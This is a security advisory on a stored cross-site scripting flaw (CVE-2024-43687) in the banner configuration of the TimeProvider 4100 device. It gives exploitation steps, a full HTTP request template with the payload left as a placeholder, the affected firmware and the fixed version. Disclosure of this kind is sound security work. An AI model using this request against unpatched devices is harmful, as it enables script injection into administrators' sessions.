Carrying on with the analysis of the "TimeProvider 4100 grandmaster device", it was possible to find out a Stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field.
![]() |
TimeProvider 4100 Grandmaster Device |
Exploitation Steps
Authenticate to the device’s management web interface.
Open the banner configuration panel.
Select the "custom banner" feature.
Insert the malicious JavaScript payload.
Apply and save the system configuration containing the custom banner.
Trigger execution by connect to the device's web management interface. Victims connection action initiates execution of the injected javascript payload.
POST /bannerconfig HTTP/1.1
Host: [device IP]
Cookie: ci_session=[session cookie]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502
Content-Length: 673
Origin: https://[device IP]
Referer: https://[device IP]/bannerconfig
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: keep-alive
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="user_level"
1
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="bannerradio"
CUSTOMIZED
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="txtcustom"
[malicious JavaScript payload]
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="action"
applybanner
-----------------------------9680247575877256312575038502--
# End
Payload execution on the victim’s browser:
By performing a login operation into the device SSH service, it is possible to view the injected malicious Javascript payload. Following an example of such connection:
Reporting Information:
Affected Versions: Firmware 1.0 through 2.4.7
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43687
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.